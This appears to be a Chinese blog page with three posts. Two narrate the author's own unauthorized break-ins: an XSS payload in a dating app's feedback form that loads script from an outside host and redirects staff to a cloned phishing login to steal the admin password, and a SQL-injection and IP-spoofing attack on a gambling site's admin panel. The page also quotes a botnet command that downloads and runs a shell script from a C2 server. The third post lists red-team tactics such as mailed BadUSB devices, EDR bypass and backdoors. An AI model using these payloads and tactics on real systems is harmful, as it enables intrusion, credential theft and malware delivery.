分类 ANONYMOUS 下的文章

前言

无聊寂寞(这不是重点),去应用市场上下载了某个同城约x软件,点开软件,首先不需要登录/注册就可以进来。。就感觉发现有问题了。

1.png

主界面是长这样的,类似探探一样可以选择心动或者忽略,忽略之后就会蹦出下一个女生的照片:

2.png

瞎划几下,就有一堆女的找我聊天,直觉告诉我这肯定是机器人:

3.png

注入点

在设置中心 -> 反馈建议处插入 xss payload:

4.png

<script src=http://t.cn/xxxx></script>

接收cookie信息

很快就可以接收到一些 cookie 信息,但是点开之后发现少了 JSESSIONID,无法直接登录到后台:

5.png

很显然是开启了 http-only:

6.png

访问一下页面:

7.png

弱口令尝试了登录不了。。爆破也没有结果,也不存在注入点。
遇到这种情况一种是两种思路:绕过 http-only 或者构造钓鱼网站,让受害者去输入账号和密码。这里我选择了后者。

构造钓鱼页面

首先构造一个和登录界面一样的页面,将源码的 js、css 下载放在本地即可。

8.png

将登录处的代码的 action 改成当前目录下的 get_data.php 文件用来接收账号和密码:

9.png

get_data.php:

10.png

接着只要构造 xss payload:

<script>window.location.href="http://xxxxxx:8080/login.html"</script>

(xxxxxx 是我自己的 vps 服务器)
使用 php 开一个 web 服务即可:

php -S 0.0.0.0:8080 -t ./

最后的效果是这样的,报一个登录超时,让受害者重新输入密码,注入完了密码之后,重新跳转回原来正常的登录页面:

11.png

等待输入

将 xss payload 插入反馈的页面,之后等待输入即可。

12.png

客服早上 10 点才上班,我大概 9 点多的时候开启了服务,这里比较好玩的是我还抓到了别的东西:

13.png

一个美国的 ip 访问了我的服务,是一个比较奇怪的链接,仔细一看这个就是抓肉鸡的链接:

shell?cd+/tmp;wget+http:/\/185.62.188.45/jaws.sh+-O+-+>.ske.sh;chmod+777+.ske.sh;sh+.ske.sh

搜索了一下 jaws ,这个是摄像头的一个牌子,在 1.0 版本下的 /shell 路径存在一个命令执行漏洞,很显然这个就是批量抓肉鸡了。C2C 服务器是 185.62.188.45。

上钩

我就等啊等,到 9.58 的时候,发现那边已经访问了我的链接,应该是客服准时上班了,但是他过了几分钟也没有点击登录进来,一直在登录界面观望(没有访问 get_data.php 说明他没有输入密码),我就觉得他应该是起了疑心了吧。

14.png

正在我准备放弃的时候,我发现有另外一个 IP 访问了我的服务器,而且还输入了密码(怀疑这里是他发现登录不上的时候询问了管理员,管理员一顿操作直接看也不看就登录上)!!赶紧看看日志:

15.png

激动的发现就是 admin 账号!

16.png

登录后台

拿到账号密码赶紧登录一波,看了一下果然是最高管理员的权限,并且菜单的功能还挺多的:

17.png

先习惯性看一下用户反馈,果然不出所料,肯定是一堆机器人。。。这不坑骗广大男同胞吗?

18.png

下面的一些截图也可以证明:

查询机器人的数量 11089:

19.png

正常女性用户这里是 115 名,而且不包括男性朋友选择了女性角色的情况,所以这里至少 90% 是机器人,毋庸置疑了:

20.png

另外还有一些让人惊讶的地方:
这是从 25 号凌晨开始到 10 点多的订单总额,50w!!!

21.png

查了一下昨天 24 号的,200多w!我的天,这流水量超过了我的预期,这骗子软件有这么多人充钱,这些男性都如此饥渴嘛。。傻傻分不清是不是机器人还是真人。。
一周的充值金额数,8 位数!!这他妈比做黑产还赚钱。

22.png

这是 AI 自动回复的消息:

23.png

想感叹一句,这可够智能的啊:

24.png

某日寒风萧萧,正吃着泡面,小组成员丢来一个BC站,说拿到shell请我吃外卖,为了吃顿好的,必须盘它。

1.jpg

山重水复疑无路

先对站点的功能进行了一波浏览,并没有发现什么明显的漏洞。搭建网站的也不是什么常见的cms。
目录扫描 打开御剑和7kbstorm大佬的工具对网站目录进行一波扫描

御剑目录扫描:

2.png

7kbstorm目录扫描

3.png

扫描结果并没有发现什么敏感目录。

子域名爆破 于是我决定爆破一波子域名,正常情况下,这种小站点的子域名也少得可怜,大多数没有子域名,不过一旦有发现就很可能有重大突破 这里我使用lijiejie的子域名爆破工具。

4.png

发现了5个子域名

5.png

其中有两个可以正常访问 admin.xxx.com和dl.xxx.com

一处是管理后台admin.xxx.com

6.png

另一处是代理管理系统 dl.xxx.com

7.png

两个比较之下,代理管理系统连验证码都没有,应该会比较好日。所以先日dl.xxx.com。 弱口令爆破+万能密码尝试 使用burp intruder爆破弱口令,并没有什么收获. 万能密码也登不上。

8.png

接下来拦截登录请求,放到sqlmap测试一下是否存在注入,然而并没有注入。 测试到这里,我们整理一下思路:

1.我们可以继续日dl.xxx.com : 尝试爆破敏感目录、扫描端口、查找js文件看看是否存在未授权访问的接口。
2.继续日www.xxx.com;尝试扫描端口、查找js文件
3.日另一个子域admin.xxx.com

柳暗花明又一村

我们选择先日admin.xx.com

9.png

尝试使用弱口令amdin 123456登录,抓包发现验证码并没有在请求包中出现,也就是说验证码实际上是无效的,有点兴奋,我们可以使用burp intruder+字典爆破弱口令

10.png

又白高兴一场,测试不存在弱口令。 尝试了万能密码并没有什么卵用。 继续拦截登录请求包,放到sqlmap跑sql注入. 这一次sqlmap带来了惊喜,跑出了注入

11.png

--dbs跑库

12.png

看到库名ManageDB,直觉这就是管理员库 --tables跑出了user表,--dump跑出数据

13.png

数据里包括了管理员账号,管理员密码,还有管理员的ip,管理员的最后登录时间。 看到最后登录时间是2019.11.29,看来管理员还是经常登录的。 拿着密文来到cmd5解密一波,真是日了狗了,是个收费密文 来到somd5试一下,解出了明文

14.png

回到后台,输入账号和密码登录,然而

15.png

卧槽,竟然还验证登录ip。 灵机一动,我想到了刚才和管理员账号密码一起跑出来的管理员ip应该就是允许登陆的ip地址 以我多年CTF的经验,加个X-Forwarded-For头就可以简单伪造ip了,尝试一下

16.png

Bingo,登陆成功,CTF诚不我欺~

17.png

还有机器人配置这个操作,看来果然是骗子网站

18.png

翻了翻后台功能,并没有上传点,也不是常见的cms管理后台,不存在那种表面上被阉割事实上通过url路径还是可以访问的功能。 到这里就结束了吗?

19.png

虽然我们找不到上传点,但我们有一处sql注入,可以尝试直接写shell 先看一下是不是dba权限。

20.png

哦豁,是dba权限 可惜这是一个sql server数据库,看到网上sqlmap写shell教程里,先选择脚本语言,再选择绝对路径.....我的内心毫无波澜,因为sql server的--os-shell是这样的,和mysql完全不同

21.png

得到网站绝对路径的步骤就不说了,因为在这里没什么卵用,当我兴致满满的写shell的时候才发现并没有写权限。

22.png

这算哪门子dba权限!不过对于这种BC站,就算发生再魔幻的事情我都能接受。

最后的尝试

用nmap扫一波端口

23.png

3389端口没有开,不过1433端口是开放的,我们尝试爆破一波弱口令,看能不能直接连上mssql数据库。之前得到的后台管理密码也要尝试一下,万一和数据库是同一个密码呐。 事实证明我想太多了,不是弱口令,密码也和网站后台不一样。

到了这里,我知道外卖遥不可及,看着已经凉透的泡面,我加了点热水,含泪吃了起来。

这次参加阿里白帽大会,对无声的一个师傅的议题印象比较深刻,ppt暂时不知道会不会共享,我个人想做个总结,最近事情一大堆,学习的效率变慢了许多,不能让这些东西一直压着我.XD

飞机刚起飞,希望到家之前能够写完.

小灰师傅说:"这次由于时间问题,还有很多好玩的没分享出来."
我:"Tql"

以下内容属于我个人YY.

前言

现在各种议题数不胜数,但是我看对眼的比较少.

红队的特点是什么?

区别于传统的渗透测试,更偏向于实战,面对的场景也更加复杂,技术繁多,以目的为导向,需要有能够解决突发问题的能力.

红队的核心是什么?

发散思维,让各种技术有应用场景,需要有更多的攻击面,掌握特殊技巧.

红队之路是什么?

在实践中不断地"填坑",不断实战,完善战术和武器的过程.

大型网络渗透的思路有哪些?

参考来自红队的一些Tricks(小灰师傅的另外一个议题),ppt自行谷歌查找.

撕开口子(ssrf->内网渗透)
判断出目标位置和目标环境
通过osint,获得关键信息,攻击脆弱系统,进入内网.
寻找"软柿子",从邮箱突破 ->获得VPN账号密码->内网渗透->.....

边界渗透

组织业务架构分析(天眼查,主站业务方向,业务合作单位,海外业务)
判断目标网络架构(ssrf,内网ip泄露,citrix,exchange,域认证,云盘,文库,git)
关键业务分析(员工通讯录,密码字典制作,各种oa(泛微,通达,致远,金蝶),mail,vpn,通讯工具,sso)

外网攻击入口选择

关注度低和防护薄弱的系统(边远地区,无MFA机制的系统,使用高危漏洞进行批量)

供应链打击
办公系统,集权系统
有敏感信息泄露的系统
业务线较长的系统(公司的网络结构分布在各个地市,进行迂回攻击)
常见的信息收集

pdns
子域名网段
github检索
爬兄弟域名
app请求
js信息收集
微信公众号
favicon.ico
ssl cert

横|纵向移动

先潜伏,别急于扫描,会触发edr
潜伏策略(dns,icmp,tcp,http,测试机,备份机,老资产,运维终端pc,办公区,业务大,复杂的系统)
内网知识储备(很多人问我内网渗透怎么学好点,我的建议都是去copy dm写的那本书的目录,自己网上查查资料,东西不多,需要实践,不实践你永远不会踩坑,也不会进步)
域渗透基础知识(自行谷歌学习)
内网信息收集(自行谷歌学习)

防御对抗
hw遇到的防护手段 (封ip,waf,白名单机制,各种安全设备(nids,hids,edr,soc,蜜罐),溯源反制)
对策(代理池,cms识别,waf测试与绕过,加载自己的dll,逆向agent,patch掉防火墙等设备,流量加密,虚拟机,心跳包回连,回连cdn,回连端口转发)

Content

"水坑攻击"在红队场景的运用
对抗技术在红队行动中的实践
主被动方式结合-实现挖坑反击
RedTeamer的未来

"水坑攻击"在红队场景的运用

github蜜罐,你遇到过吗?
以及内网的一些常见服务蜜罐.将redis部署在真实环境里,但是redis服务的流量走的是蜜罐系统,导致被防守方逮到.

使用OSINT进行情报搜集

搜索引擎(fofa,shodan,Google,Zoomeye,bing)
百度文库,CSDN
天眼查相关资产
riskiq.com开源情报
子域名,爬虫链接,github
内部情报(加QQ群,钉钉群,微信群)

收集到架构,资产,邮箱,敏感资料,专利,账号密码等等

通过收集的账号密码登录邮箱系统,coremail rce->导出邮件内容->被系统制裁.

tricks

github在设置邮箱的时候可以获得github账户名,脚本批量测试
看图说话

1.jpg

jsonp劫持可以获取目标的互联网信息,qq邮箱,163邮箱等.

供应链攻击,留后门

获取到开发人员权限后,可以选择往源码里插入一段js,等源码部署以后,可以结合xss平台进行权限维持(键盘记录,内网渗透等等)
xss平台beef其实很香的,模块很多.
js后门的好处:

获得代码部署地址
键盘记录
通过ajax动态获得页面内容
通过访问ip分析人员区域
随时更改js内容,做进一步利用,ie浏览器和flash攻击

近源攻击

2.jpg

U盘攻击

直接往人家银行门口扔U盘?你咋知道被谁捡去了,赔钱的买卖.
通过信息收集,和其他的方法找到工作人员地址,比如订单信息泄露,寄一个badusb到他家,往U盘里送上最真挚的祝福,加一个小贺卡,让他快点打开看看U盘里面你对他到底进行了啥祝福.

badusb的一些tricks:

使用unicode反转字符攻击,诱导点击
可执行文件的后缀-dll,hta,bat,sct,vbs,ps1
office漏洞利用和宏攻击
特殊文件后缀名,exe,pif,com,cmd,scr
双击反弹shell文件和脚本,chm,ink,iqy,jsjse,cpl,wsh,wsf

注册表HKEY/LOCALMACHINE/SOFTWARE/Classes中可以找到能执行命令的后缀.

WIFI钓鱼

近源攻击中最为常见的就是路由器,有0day的话可以进行链路劫持,进行行为审计,
看一下无声的这个武器.

3.jpg

可见武器化的好处

一次攻击链:

webrtc获取内网地址
对可以发起http请求导致rce的路由器发起探测
获得权限后,通过流量采集获取某些网站接口的凭据,强制加好友
聊天触发某插件热更新,劫持替换,运行导致收集rce

WIFI登录页面钓鱼

在内网的话,可以获取员工的工号和密码,ACl配置不当的情况下可以扫描内网资源(DNS重定向)
抓hash
dns可控的情况下,结合WPAD进行中继攻击

对抗技术在红队行动中的实践

ip封禁

https://github.com/RhinSecurityLabs/IPRotate_Burp_Extension

通过aws的服务进行ip替换

或者使用pymultitor

DMZ出网的权限维持

常规是使用DNS,HTTP协议

换个思路,直接把邮件服务器当做C2,传递信息回来,相关代码自己github查找

EDR多维度对抗

实时监控是否有特定的进程执行,参数和进程的调用关系树
内存分析
异常检测
流量监测

Bypass(后面几种是我的想法):

参数污染
shellcode分离加载
行为免杀
反沙箱(判断当前环境是否是沙箱,内存,磁盘空间,等等,参考veil模块)
无文件技术(用forfiles免杀)
流量免杀
shellcode加密
blockdll
白加黑利用

权限维持
单机权限维持(这个我最近在写总结,尽快赶出来)

服务类:bitadmin,计划任务,sqlserver job
logon Scripts修改注册表
dll劫持
白加黑利用
服务类路径,通过powerup寻找加以利用

域权限维持

看图,做一个补充

4.jpg

主被动方式实现挖坑反击

内网横向移动技术到底是研究什么?

内网拓扑环境,知道有哪些机器,我现在在哪个位置,下一步我要去哪?
获得当前账户,具有什么权限,受什么规则影响,可以进行什么操作,可以用什么手段横向?
怎么获得更多的用户名和密码以及权限
怎么拿到域内指定的机器(日志,邮件,收集的信息,ldap查询)

护网横向移动优先攻击策略

目标内网往往非常大,快读定位和找到关键节点是攻击的关键,选择的主要原则为:

快速掌握目标网络架构和网络设备及集权系统,(堡垒机,运维管理机,性能监控系统,集中管控系统,域控等)
查找配置文件,系统日志,管理文件,建设方案,wiki,文档云,托管代码等,获取敏感信息,为纵向移动打下基础.

网络环境中的信息收集

dns信息
快速定位域控(方法很多,不多说)
route信息
net view dc
域信息(dc,group,user,密码策略,委派关系,票据,域信任关系)
445端口获取banner判断是否在域内
ldap query
spn扫描
域认证服务机器日志

DNS

使用ping -a反向解析IP
先通过ldap查询获得域内计算机名称,再通过dns查询获得ip
dnscnd的使用

单主机,系统程序,安装软件

系统日志(追踪来源,堡垒机,管理人员电脑)
最近使用的程序
安装应用
浏览器历史记录,浏览器密码,代理配置
系统密码,hash,mscache,rdp连接记录,rdp凭据,vpn,xshell,Navicat,winscp
内存中kerberos票据
其他用户token
session信息
redthief被动获取密码

精准定位

域控日志
系统记录日志
查询用户userWorkstation字段
使用组策略给用户绑定登录脚本
Email

RedTeamer的未来

红队是多元化的,需要有多方面的能力,武器化是重点,学以致用(win32 api,Windows核心编程,c/c++/c#/powershell)
尝试跨界,去了解更多未知的精彩
提高自身业务能力,增加深度,不满足于表面,要有危机感.

我为啥没有具体去介绍文中的技术点呢?

XD

快下飞机了,想家!